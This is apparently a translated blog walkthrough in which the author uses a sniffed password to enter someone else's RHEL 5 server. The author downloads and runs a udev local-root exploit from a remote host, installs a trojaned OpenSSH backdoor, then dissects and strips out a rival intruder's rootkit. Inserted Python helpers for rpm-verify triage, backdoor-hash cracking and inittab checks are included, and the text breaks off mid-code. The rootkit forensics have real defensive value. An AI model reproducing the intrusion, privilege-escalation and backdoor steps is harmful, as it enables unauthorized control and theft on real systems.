A simple manual intrusion-detection walkthrough on one of my Linux zombies
Today I noticed that, on one of my zombies, someone else's ssh session had gone out to another server, and the login password had been logged.
[root@mail ~]# cat /tmp/sshpswd
ldc:sle823jfsGs@222.222.66.11
Straight away I ssh in.
[root@mail ~]# ssh ldc@222.222.66.11
ldc@222.222.66.11's password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel \r on an \m
[ldc@localhost ldc]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux
It's RHEL 5.0 on the stock kernel, never updated, so the vmsplice local root (CVE-2008-0600) ought to work. When I tried it, though, the box hung, so I switched to the udev exploit (the 2009 netlink bug, CVE-2009-1185) instead.
[ldc@localhost ldc]$ mkdir .v
[ldc@localhost ldc]$ cd .v
[ldc@localhost .v]$ wget http://211.100.50.70/u.sh
--13:21:09--  http://211.100.50.70/u.sh
HTTP request sent, awaiting response... 200 OK
Length: 3366 (3.3K) [application/x-sh]
Saving to: `u.sh'
100%[==========================================>] 3,366       --.-K/s   in 0.04s
13:21:09 (93.7 KB/s) - `u.sh' saved [3366/3366]
[ldc@localhost .v]$ ls
r00t  r00t.c  u.sh
[ldc@localhost .v]$ chmod +x u.sh
[ldc@localhost .v]$ cat /proc/net/netlink
sk       Eth Pid  Groups   Rmem Wmem Dump     Locks
f69f8800 0   2486 00000111 0    0    00000000 2
f7fdae00 0   0    00000000 0    0    00000000 2
c2132200 6   0    00000000 0    0    00000000 2
f6a57a00 7   2143 00000001 0    0    00000000 2
f7caf000 7   0    00000000 0    0    00000000 2
f6a0be00 9   2143 00000000 0    0    00000000 2
f6a61200 9   1996 00000000 0    0    00000000 2
f7de1c00 9   0    00000000 0    0    00000000 2
f7d7ca00 10  0    00000000 0    0    00000000 2
f7fb3200 11  0    00000000 0    0    00000000 2
c2154200 15  476  ffffffff 0    0    00000000 2
f7fdac00 15  0    00000000 0    0    00000000 2
f7fb3000 16  0    00000000 0    0    00000000 2
c21cde00 18  0    00000000 0    0    00000000 2
[ldc@localhost .v]$ ps aux | grep udev
root       476  0.0  0.0   2916  1396 ?        S<   12:36   0:00 /sbin/udevd -d
ldc       3462  0.0  0.0   4128   680 pts/0    S    13:00   0:00 grep udev
Netlink protocol 15 is NETLINK_KOBJECT_UEVENT, so the netlink socket bound to pid 476 in the listing above belongs to udevd; that pid is the argument the exploit script takes.
[ldc@localhost .v]$ sh u.sh 476
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh
Root already.
sh-3.1# w
 13:25:18 up 48 min,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
ldc      pts/0    100.204.107.20    13:05    0.00s  0.12s  0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
First let's leave ourselves an ssh backdoor: a trojaned build of the same OpenSSH 4.3p2 the box already runs, installed over it.
sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz
--13:32:08--  http://211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 979990 (957K) [application/x-gzip]
Saving to: `openssh4.3p2.tar.gz'
100%[==========================================>] 979,990     1.14M/s   in 0.8s
13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990]
sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh
checking for gcc... gcc
checking for C compiler default output file name... a.out
............(lines omitted)
sh-3.1# make && make install
conffile=`echo sshd_config.out | sed 's/.out$//'`; \
    /bin/sed -e 's|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g' -e
............(lines omitted)
sh-3.1# cp ssh_config sshd_config /etc/ssh/
sh-3.1# /etc/rc.d/init.d/sshd restart
Stopping sshd:                                             [  OK  ]
Starting sshd:                                             [  OK  ]
OK, now log in through our sshdoor.
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh
[root@localhost ~]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2208          0.0.0.0:*               LISTEN      2298/hpiod
tcp        0      0 0.0.0.0:1000            0.0.0.0:*               LISTEN      2090/rpc.statd
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      2056/portmap
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      2883/vsftpd
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      2315/cupsd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      2361/sendmail: acce
tcp        0      0 127.0.0.1:2207          0.0.0.0:*               LISTEN      2303/python
Something is off about this box: the sshd we just restarted does not show up on port 22 at all, so netstat itself has probably been replaced. Before trusting anything else, let's see which other system files have been swapped out. rpm's verify mode compares every installed file against the package database (size, mode, MD5 digest, owner, group, mtime), which is a cheap first pass as long as rpm and its database are themselves intact:
[root@localhost ~]# rpm -qaV
S.5..UG.  /bin/netstat
S.5..UG.  /sbin/ifconfig
S.5....T  /usr/bin/ssh-keygen
S.5....T  c /etc/sysconfig/system-config-securitylevel
S.5..UG.  /usr/sbin/lsof
.M......  /var/tux
S.5....T  c /etc/inittab
S.5....T  /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_dl14.map
S.5....T  /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_ndl14.map
S.5....T  /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_dl14.map
S.5....T  /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_ndl14.map
S.5....T  /usr/share/texmf-var/web2c/aleph.fmt
S.5....T  /usr/share/texmf-var/web2c/amstex.fmt
S.5....T  /usr/share/texmf-var/web2c/bamstex.fmt
S.5....T  /usr/share/texmf-var/web2c/bplain.fmt
S.5....T  /usr/share/texmf-var/web2c/cont-en.fmt
S.5....T  /usr/share/texmf-var/web2c/etex.fmt
..5....T  /usr/share/texmf-var/web2c/metafun.mem
S.5....T  /usr/share/texmf-var/web2c/mf.base
..5....T  /usr/share/texmf-var/web2c/mpost.mem
S.5....T  /usr/share/texmf-var/web2c/mptopdf.fmt
S.5....T  /usr/share/texmf-var/web2c/omega.fmt
S.5....T  /usr/share/texmf-var/web2c/pdfetex.fmt
S.5....T  /usr/share/texmf-var/web2c/pdftex.fmt
S.5....T  /usr/share/texmf-var/web2c/tex.fmt
.......T  c /etc/kdump.conf
S.5....T  c /etc/printcap
..5....T  c /etc/pki/nssdb/secmod.db
....L...  c /etc/pam.d/system-auth
.M......  c /etc/cups/classes.conf
.......T  c /etc/audit/auditd.conf
missing   /usr/sbin/nscd
S.5....T  c /etc/sysconfig/named
.M......  /var/named
SM5..UG.  /bin/ps
SM5..UG.  /usr/bin/top
SM5....T  c /etc/sysconfig/iptables-config
S.5..UG.  /usr/bin/find
prelink: /usr/lib/libGL.so.1.2.#prelink#.crFdQJ Could not trace symbol resolving
S.?.....  /usr/lib/libGL.so.1.2
S.5....T  c /etc/ppp/chap-secrets
S.5....T  c /etc/ppp/pap-secrets
S.5....T  c /etc/xml/catalog
S.5....T  c /usr/share/sgml/docbook/xmlcatalog
S.5....T  c /etc/ssh/ssh_config
S.5....T  /usr/bin/scp
S.5....T  /usr/bin/sftp
S.5....T  /usr/bin/ssh
S.5....T  /usr/bin/ssh-add
SM5...GT  /usr/bin/ssh-agent
S.5....T  /usr/bin/ssh-keyscan
S.5....T  /usr/share/texmf-var/fonts/map/dvips/updmap/builtin35.map
S.5....T  /usr/share/texmf-var/fonts/map/dvips/updmap/download35.map
S.5....T  /usr/share/texmf-var/fonts/map/dvips/updmap/ps2pk.map
S.5....T  /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_pk.map
S.5....T  /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_t1.map
S.5....T  /etc/sgml/docbook-slides.cat
S.5....T  /usr/share/icons/hicolor/icon-theme.cache
S.5..UG.  /bin/ls
S.5..UG.  /usr/bin/dir
S.5..UG.  /usr/bin/md5sum
S.5..UG.  /usr/bin/pstree
S.5....T  c /etc/syslog.conf
S.5....T  c /etc/ssh/sshd_config
S.5....T  /usr/sbin/sshd
missing   /var/lib/texmf/ls-R
S.5....T  /etc/sgml/docbook-simple.cat
S.5....T  c /etc/vsftpd/vsftpd.conf
.M......  /var/ftp/pub
S.5....T  c /etc/mailcap
......G.  /var/cache/samba/winbindd_privileged
.......T  c /etc/mail/sendmail.cf
SM5....T  c /etc/mail/submit.cf
S.5....T  c /var/log/mail/statistics
..5....T  c /usr/lib/security/classpath.security
S.5....T  c /etc/sane.d/dll.conf
At least rpm itself was not replaced. Reading the flags: S, 5, U and G mean size, MD5 digest, owner and group all differ from what the package shipped, and that pattern on /bin/ps, /bin/ls, /bin/netstat, /sbin/ifconfig, /usr/bin/top, /usr/bin/find, /usr/bin/dir, /usr/bin/md5sum, /usr/bin/pstree and /usr/sbin/lsof is a textbook set of replaced utilities. (The ssh binaries and configs showing S.5....T are our own OpenSSH build that we just installed over /usr; the texmf format files and similar S.5....T entries are regenerated after installation and are normal noise.) So quite a few system commands have been swapped out. Heh, a colleague has been here.
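A long rpm -V listing like the one above is easier to read once it is sorted mechanically. Here is that sifting as an added example (not code from the post): it parses rpm's verify flags and separates replaced binaries from config and cache noise, then picks out the ones whose owner or group changed too, which on this box marked the intruder's tools as opposed to our own sshd rebuild. The flag layout is rpm's own; the sample lines are cut down from the listing above, and the directory allow-list is this example's assumption. It is still only as trustworthy as rpm and its database on the box; for a real incident, verify against package files from trusted media (rpm -Vp) as well.

```python
import re

# rpm -V flag string: S size, M mode, 5 digest, D device, L link, U user, G group, T mtime
# (RHEL 5 prints 8 columns; newer rpm adds P for capabilities, so accept 8 or 9).
FLAGS_RE = re.compile(r"^[SM5DLUGTP.?]{8,9}$")

# Paths where a changed digest means a replaced program or library rather than a
# regenerated cache (assumption for this example; tune per distribution).
BIN_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/lib/", "/usr/lib/")

# Constructed sample, cut down from the rpm -qaV listing in the post.
SAMPLE = """\
S.5..UG.  /bin/netstat
S.5..UG.  /sbin/ifconfig
S.5....T  /usr/bin/ssh-keygen
S.5....T  c /etc/sysconfig/system-config-securitylevel
S.5..UG.  /usr/sbin/lsof
.M......  /var/tux
S.5....T  c /etc/inittab
S.5....T  /usr/share/texmf-var/web2c/tex.fmt
....L...  c /etc/pam.d/system-auth
missing   /usr/sbin/nscd
SM5..UG.  /bin/ps
prelink: /usr/lib/libGL.so.1.2.#prelink#.crFdQJ Could not trace symbol resolving
S.?.....  /usr/lib/libGL.so.1.2
S.5....T  /usr/sbin/sshd
S.5..UG.  /bin/ls
"""


def parse_rpm_verify(text):
    """Yield (flags, is_config, path) for each real result line of `rpm -Va` output."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        flags = parts[0]
        if flags != "missing" and not FLAGS_RE.match(flags):
            continue  # prelink chatter and other non-result lines
        # optional one-letter file type between flags and path:
        # c config, d documentation, g ghost, l licence, r readme
        if len(parts) >= 3 and len(parts[1]) == 1 and parts[1] in "cdglr":
            yield flags, parts[1] == "c", parts[2]
        else:
            yield flags, False, parts[1]


def triage(text):
    """Split verify output into replaced binaries, missing files and everything else.

    A file counts as replaced when its digest differs (column 3 is '5') and it lives
    under BIN_DIRS; config files are left out because edits there are expected.
    A '?' digest (rpm could not read the file, e.g. the prelink trouble above) is
    reported under 'other' rather than silently passed.
    """
    replaced, missing, other = [], [], []
    for flags, is_config, path in parse_rpm_verify(text):
        if flags == "missing":
            missing.append(path)
        elif not is_config and flags[2] == "5" and path.startswith(BIN_DIRS):
            replaced.append((path, flags))
        else:
            other.append((path, flags))
    return replaced, missing, other


def owner_changed(replaced):
    """Replaced binaries whose owner or group also changed (U/G flags): on the box
    above that pattern marked the rootkit's tools, while the OpenSSH rebuild only
    changed size, digest and mtime."""
    return [path for path, flags in replaced if "U" in flags or "G" in flags]


if __name__ == "__main__":
    replaced, missing, other = triage(SAMPLE)
    for path, flags in replaced:
        tag = "REPLACED+OWNER" if path in owner_changed(replaced) else "REPLACED"
        print("%-15s %s %s" % (tag, flags, path))
    for path in missing:
        print("%-15s %s" % ("MISSING", path))
    print("%d other entries (config, cache, unverifiable)" % len(other))
```

Run it as `rpm -Va | python3 triage.py` style by swapping SAMPLE for sys.stdin.read(); the output order follows rpm's, which is package order, so sort by path if you want /bin and /sbin grouped.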
Sorry, but I'm going to kick you off. Before checking anything further we have to accept that nothing on this box can be trusted, so first put trusted copies of the commands back:
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
cp: cannot remove `/usr/bin/dir': Operation not permitted
Root and still "Operation not permitted": the file has had ext3 attributes set on it with chattr (the lsattr listing below shows s, i and a on every replaced tool; i is immutable, a is append-only), and those stop even root until they are cleared.
[root@localhost bin]# chattr -iau /usr/bin/dir
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
OK. Let's see what else carries them:
[root@localhost chkrootkit-0.48]# lsattr /bin /sbin /usr/bin /usr/sbin /etc | grep -e -ia
s---ia------- /bin/ps
s---ia------- /bin/ls
s---ia------- /bin/netstat
s---ia------- /sbin/ifconfig
s---ia------- /sbin/ttymon
s---ia------- /sbin/ttyload
s---ia------- /usr/bin/top
s---ia------- /usr/bin/md5sum
s---ia------- /usr/bin/pstree.x11
s---ia------- /usr/bin/find
s---ia------- /usr/bin/dir
s---ia------- /usr/bin/pstree
s---ia------- /usr/sbin/lsof
s---ia------- /usr/sbin/ttyload
s---ia------- /etc/sh.conf
[root@localhost bin]# chattr -iau ps ls netstat
[root@localhost bin]# rm -rf ps ls netstat
[root@localhost bin]# rz
rz waiting to receive.
[root@localhost bin]# chmod +x ps ls netstat
[root@localhost bin]# chattr +iau ps ls netstat
(rz is a ZMODEM upload through the terminal; the replacements are known-good copies brought in from outside, not anything taken from this box.) Replace /usr/sbin/lsof, /usr/bin/find and the rest the same way.
Now check the ports with netstat again:
[root@localhost bin]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2208          0.0.0.0:*               LISTEN      2298/hpiod
tcp        0      0 0.0.0.0:1000            0.0.0.0:*               LISTEN      2090/rpc.statd
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      2056/portmap
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      2883/vsftpd
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      2315/cupsd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      2361/sendmail: acce
tcp        0      0 0.0.0.0:65530           0.0.0.0:*               LISTEN      2663/ttyload   (and there it is)
tcp        0      0 127.0.0.1:2207          0.0.0.0:*               LISTEN      2303/python
tcp        0      0 :::22                   :::*                    LISTEN      13935/sshd
Now run chkrootkit and rkhunter over it:
[root@localhost .v]# ls
chkrootkit-0.48  chkrootkit.tar.gz  rkhunter  rkhunter-1.2.7.tar.gz
[root@localhost .v]# cd chkrootkit-0.48/
[root@localhost chkrootkit-0.48]# ./chkrootkit
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
............(lines omitted)
Checking `ifconfig'... INFECTED
............(lines omitted)
Checking `pstree'... INFECTED
............(lines omitted)
Checking `top'... INFECTED
............(lines omitted)
Searching for t0rn's v8 defaults... Possible t0rn v8 \(or variation\) rootkit installed
............(lines omitted)
Searching for Showtee... Warning: Possible Showtee Rootkit installed
............(lines omitted)
Searching for Romanian rootkit... /usr/include/file.h /usr/include/proc.h
............(lines omitted)
Every one of the lines above points at a problem. The family names are less reliable than the hits themselves: the "defaults" chkrootkit searches for are file paths that several kits share, so they tell you something is installed and where, not precisely which kit.
Now rkhunter; its log goes to /var/log/rkhunter.log.
[root@localhost rkhunter]# /usr/local/bin/rkhunter -c --createlogfile
Rootkit Hunter 1.2.7 is running
Determining OS... Unknown
Warning: This operating system is not fully supported!
Warning: Cannot find md5_not_known
All MD5 checks will be skipped! (rkhunter 1.2.7 has no hash database for an OS it doesn't recognise, and /usr/bin/md5sum itself is trojaned on this box anyway, so its hash checks would have meant nothing here)
............(lines omitted)
Rootkit 'SHV4'... [ Warning! ] (SHV4)
--------------------------------------------------------------------------------
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
--createlogfile and check the log file (current file: /var/log/rkhunter.log).
--------------------------------------------------------------------------------
[Press <ENTER> to continue]
Rootkit 'SHV5'... [ Warning! ] (SHV5)
--------------------------------------------------------------------------------
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
--createlogfile and check the log file (current file: /var/log/rkhunter.log).
--------------------------------------------------------------------------------
............(lines omitted)
Scanning took 84 seconds
Scan results written to logfile (/var/log/rkhunter.log)
-----------------------------------------------------------------------
Do you have some problems, undetected rootkits, false positives, ideas
or suggestions?
Please e-mail me by filling in the contact form (@http://www.rootkit.nl)
-----------------------------------------------------------------------
Now look at the log:
[root@localhost rkhunter]# cat /var/log/rkhunter.log
[15:16:51] Running Rootkit Hunter 1.2.7 on localhost.localdomain
[15:16:51]
Rootkit Hunter 1.2.7, Copyright 2003-2005, Michael Boelen
............(lines omitted)
[15:16:55] *** Start scan SHV4 ***
[15:16:55] - File /etc/ld.so.hash... OK. Not found.
[15:16:55] - File /lib/libext-2.so.7... OK. Not found.
[15:16:55] - File /lib/lidps1.so... WARNING! Exists. (one file found)
[15:16:55] - File /usr/sbin/xntps... OK. Not found.
[15:16:55] - Directory /lib/security/.config... OK. Not found.
[15:16:55] - Directory /lib/security/.config/ssh... OK. Not found.
[15:17:04] *** Start scan SHV5 ***
[15:17:04] - File /etc/sh.conf... WARNING! Exists. (one file found)
[15:17:04] - File /dev/srd0... OK. Not found.
[15:17:04] - Directory /usr/lib/libsh... WARNING! Exists. (one directory found)
............(lines omitted)
Now cross-check by hand: the tools only look for what they already know about, so anything the intruder renamed or modified they would miss.
[root@localhost sbin]# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Fo reign Address         State       PID/Program name
tcp        0      0 0.0.0.0:65530           0.0.0.0:*               LISTEN      2663/ttyload
............(lines omitted)
raw        0      0 0.0.0.0:1               0.0.0.0:*               7           2679/ttymon
............(lines omitted)
Two abnormal ones: a listener on 65530 and a raw socket held by ttymon (for raw sockets the "port" column is the IP protocol number, 1 being ICMP, which is what a flooder would use).
[root@localhost sbin]# ps aux|grep 2663
root      2663  0.0  0.0   2128   516 ?        Ss   12:37   0:00 /sbin/ttyload -q   (there's its true face)
root     15350  0.0  0.0   4088   604 pts/0    S+   15:21   0:00 grep 2663
[root@localhost sbin]# lsof -p 2663
COMMAND  PID USER   FD   TYPE DEVICE    SIZE     NODE NAME
3       2663 root  cwd    DIR  253,0    4096        2 /
3       2663 root  rtd    DIR  253,0    4096        2 /
3       2663 root  txt    REG  253,0  652620 34897965 /tmp/sh-AQJ3OQYACSO (deleted)   (a packed binary: it dropped its real executable in /tmp and unlinked it once running)
3       2663 root  mem    REG  253,0  121684  8586729 /lib/ld-2.5.so
3       2663 root  mem    REG  253,0 1576952  8586730 /lib/libc-2.5.so
3       2663 root  mem    REG  253,0  101036  8586743 /lib/libnsl-2.5.so
3       2663 root  mem    REG  253,0   15264  8586757 /lib/libutil-2.5.so
3       2663 root  mem    REG  253,0   27836  8585303 /lib/libcrypt-2.5.so
3       2663 root    0u   CHR    1,3             1517 /dev/null
3       2663 root    1u   CHR    1,3             1517 /dev/null
3       2663 root    2u   CHR    1,3             1517 /dev/null
3       2663 root    3u  IPv4   9895              TCP *:65530 (LISTEN)
[root@localhost sbin]# lsof -p 2679
COMMAND  PID USER   FD   TYPE DEVICE    SIZE    NODE NAME
ttymon  2679 root  cwd    DIR  253,0    4096       2 /
ttymon  2679 root  rtd    DIR  253,0    4096       2 /
ttymon  2679 root  txt    REG  253,0   93476  852119 /sbin/ttymon
ttymon  2679 root  mem    REG  253,0   46740 8585257 /lib/libnss_files-2.5.so
ttymon  2679 root  mem    REG  253,0  121684 8586729 /lib/ld-2.5.so
ttymon  2679 root  mem    REG  253,0 1576952 8586730 /lib/libc-2.5.so
ttymon  2679 root    3u   raw           9925         00000000:0001->00000000:0000 st=07
What's listening on 65530 is an ssh backdoor (an old ssh.com 1.x/2.x server, going by the banner):
[root@localhost sbin]# nc 127.0.0.1 65530
SSH-1.5-2.0.13
Protocol mismatch.
The password should be in here:
[root@localhost sbin]# cat /etc/sh.conf
76800957735704ee3dd8ac42779db49a -
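That "<digest> -" layout is raw md5sum output ("-" is md5sum's name for stdin), so the installer most likely did something like echo password | md5sum, and the one detail that matters when recovering the password is whether echo's trailing newline went into the hash. Here is that check as an added example (not code from the post): it validates the sh.conf line and tries a candidate list under both conventions. The sample sh.conf is constructed from the password "sshdoor" that the post installs later; the digest from the compromised box is copied in too, but nothing is claimed about what it hashes.

```python
import hashlib

# Digest line as found on the box (copied from the post; which password it hashes is unknown).
BOX_SH_CONF = "76800957735704ee3dd8ac42779db49a -\n"

# Constructed sample in the same layout, generated from the password the post installs
# later, so the recovery below can be demonstrated offline.
SAMPLE_SH_CONF = hashlib.md5(b"sshdoor\n").hexdigest() + " -\n"

# Constructed candidate list; in a real case feed it passwords seen elsewhere on the box
# (the sniffer log, other kits' configs) and then a wordlist.
CANDIDATES = ["root", "123456", "sshdoor", "shv5", "password"]


def parse_sh_conf(text):
    """Return the 32-hex digest from an md5sum-style '<digest> -' line; reject anything else."""
    fields = text.split()
    if not fields:
        raise ValueError("empty sh.conf")
    digest = fields[0].lower()
    if len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("not an md5 digest: %r" % fields[0])
    return digest


def md5_variants(password):
    """Both digests a setup script could have stored: with the trailing newline that
    `echo password | md5sum` includes, and without it (`echo -n` / `printf`)."""
    pw = password.encode()
    return {hashlib.md5(pw + b"\n").hexdigest(), hashlib.md5(pw).hexdigest()}


def recover_password(sh_conf_text, candidates):
    """First candidate whose md5 (either convention) equals the stored digest, else None."""
    target = parse_sh_conf(sh_conf_text)
    for pw in candidates:
        if target in md5_variants(pw):
            return pw
    return None


if __name__ == "__main__":
    print("constructed sample:", recover_password(SAMPLE_SH_CONF, CANDIDATES))
    print("digest from the box:", recover_password(BOX_SH_CONF, CANDIDATES))
```

An unsalted MD5 of a short password is no protection at all against a wordlist, which is worth knowing because the same backdoor password tends to be reused by the intruder across every box the kit was installed on.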
That is not encryption, just an md5sum of the password that the backdoor compares digests against. Now the other config file:
[root@localhost sbin]# cat /lib/lidps1.so
ttyload
shsniff
shp
shsb
hide
burim
synscan
mirkforce
ttymon
sh2-power
Looks like the trojaned ps's config: the list of process names it hides.
Now the other process:
[root@localhost sbin]# strings /sbin/ttymon
............(lines omitted)
Usage: %s <dst> <src> <size> <number>
Ports are set to send and receive on port 179
dst: Destination Address
src: Source Address
size: Size of packet which should be no larger than 1024 should allow for xtra header info thru routes
num: packets
Could not resolve %s *** nut
Googling those strings, it is a packet-flooding DoS tool, which explains the raw socket. If you're curious, the source is at http://www.securityfocus.com/archive/82/334848 and you can build it and play with it.
OK, now into the intruder's lair:
[root@localhost sbin]# cd /usr/lib/libsh
[root@localhost libsh]# ls -al
total 140
drwxr-xr-x   6 root  root   4096 Dec 18  2008 .
drwxr-xr-x 118 root  root  69632 Jul 17 13:55 ..
drwxr-xr-x   2 root  root   4096 Dec 18  2008 .backup
-rwxr-xr-x   1 122   114    1206 Apr 18  2003 .bashrc
-rwxr-xr-x   1 122   114    2000 Nov 28  2006 hide
drwxr-xr-x   2 root  root   4096 Dec 18  2008 .owned
-rwxr-xr-x   1 122   114    1345 Nov 28  2006 shsb
drwxr-xr-x   2 root  root   4096 Jul 14 04:03 .sniff
drwxr-xr-x   2 gaobo gaobo  4096 Nov 28  2006 utilz
[root@localhost libsh]# ls .backup/
dir  find  ifconfig  ls  lsof  md5sum  netstat  ps  pstree  top
Those are the originals of our system binaries, which the kit backed up before replacing them; they can be restored straight from here (run rpm -V again afterwards to confirm they match the package database). The numeric owner 122:114 is the uid/gid the files carried inside the kit's tarball, which maps to no account on this box; that is presumably why rpm flagged U and G on the replaced tools, and it is what makes find -nouser useful below.
Then go after the other config files with find (steps omitted). Everything turned up in the end:
[root@localhost libsh]# find / -nouser
/lib/libsh.so/shhk.pub
/lib/libsh.so/shhk
/lib/libsh.so/shrs
............(lines omitted)
[root@localhost libsh]# cd /lib/libsh.so/
[root@localhost libsh.so]# ls
bash  shdcf  shhk  shhk.pub  shrs
This directory holds the backdoor sshd's configuration and key files.
The rest can be found by keyword, e.g. find / -name "*" -exec grep -l "ttyload" {} \; (add -type f so grep does not try to read device nodes).
[root@localhost lib]# cat /usr/include/proc.h
3 burim
3 mirkforce
3 synscan
3 ttyload
3 shsniff
3 ttymon
3 shsb
3 shp
3 hide
4 ttyload
[root@localhost lib]# cat /usr/include/file.h
sh.conf
libsh
.sh
system
shsb
libsh.so
shp
shsniff
srd0
[root@localhost lib]# cat /usr/include/hosts.h
2 212.110
2 195.26
2 194.143
2 62.220
3 2002
4 2002
3 6667
4 6667
3 65530
4 65530
[root@localhost lib]# cat /usr/include/log.h
mirkforce
synscan
syslog
Now, how does it get started?
[root@localhost lib]# cat /etc/inittab
#
# inittab       This file describes how the INIT process should set up
#               the system in a certain run-level.
#
# Author:       Miquel van Smoorenburg, <miquels@drinkel.nl.mugnet.org>
#               Modified for RHS Linux by Marc Ewing and Donnie Barnes
#
# Default runlevel. The runlevels used by RHS are:
#   0 - halt (Do NOT set initdefault to this)
#   1 - Single user mode
#   2 - Multiuser, without NFS (The same as 3, if you do not have networking)
#   3 - Full multiuser mode
#   4 - unused
#   5 - X11
#   6 - reboot (Do NOT set initdefault to this)
#
id:5:initdefault:
# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit
l0:0:wait:/etc/rc.d/rc 0
l1:1:wait:/etc/rc.d/rc 1
l2:2:wait:/etc/rc.d/rc 2
l3:3:wait:/etc/rc.d/rc 3
l4:4:wait:/etc/rc.d/rc 4
l5:5:wait:/etc/rc.d/rc 5
l6:6:wait:/etc/rc.d/rc 6
# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
# When our UPS tells us power has failed, assume we have a few minutes
# of power left.  Schedule a shutdown for 2 minutes from now.
# This does, of course, assume you have powerd installed and your
# UPS connected and working correctly.
pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"
# If power was restored before the shutdown kicked in, cancel it.
pr:12345:powerokwait:/sbin/shutdown -c "Power Restored; Shutdown Cancelled"
# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm -nodaemon
# Loading standard ttys
0:2345:once:/usr/sbin/ttyload        (here it is)
# Run gettys in standard runlevels
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
# modem getty.
# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem
# fax getty (hylafax)
# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem
# vbox (voice box) getty
# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6
# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7
# end of /etc/inittab
An extra "once" entry, dressed up with a "Loading standard ttys" comment and an id of 0 so it blends in with the getty lines right after it. Now its startup file:
[root@localhost lib]# cat /usr/sbin/ttyload
/sbin/ttyload -q >/dev/null 2>&1
/sbin/ttymon >/dev/null 2>&1
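rpm -V had already flagged /etc/inittab as a changed config file ("S.5....T c") much earlier, which is easy to wave away because config files do change; this entry is what it was pointing at. Here is a way to triage inittab mechanically, as an added example (not code from the post): it strips comments, splits the id:runlevels:action:process fields, reports every entry whose program is outside a stock list, and follows a one-command-per-line wrapper one hop to see what it really starts. The stock program list is this example's assumption (build it from a clean install of the same release, never from the suspect box), and the inittab and wrapper samples are constructed from the listings above.

```python
# Programs a stock RHEL 5 inittab invokes (assumption for this example; derive the
# real list from a clean install of the same release, not from the suspect box).
STOCK_INITTAB_PROGRAMS = {
    "/etc/rc.d/rc.sysinit", "/etc/rc.d/rc", "/sbin/shutdown",
    "/etc/X11/prefdm", "/sbin/mingetty",
}

# Constructed sample: the relevant part of the inittab shown above.
INITTAB = """\
# Default runlevel.
id:5:initdefault:
# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit
l3:3:wait:/etc/rc.d/rc 3
l5:5:wait:/etc/rc.d/rc 5
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"
x:5:respawn:/etc/X11/prefdm -nodaemon
# Loading standard ttys
0:2345:once:/usr/sbin/ttyload
# Run gettys in standard runlevels
1:2345:respawn:/sbin/mingetty tty1
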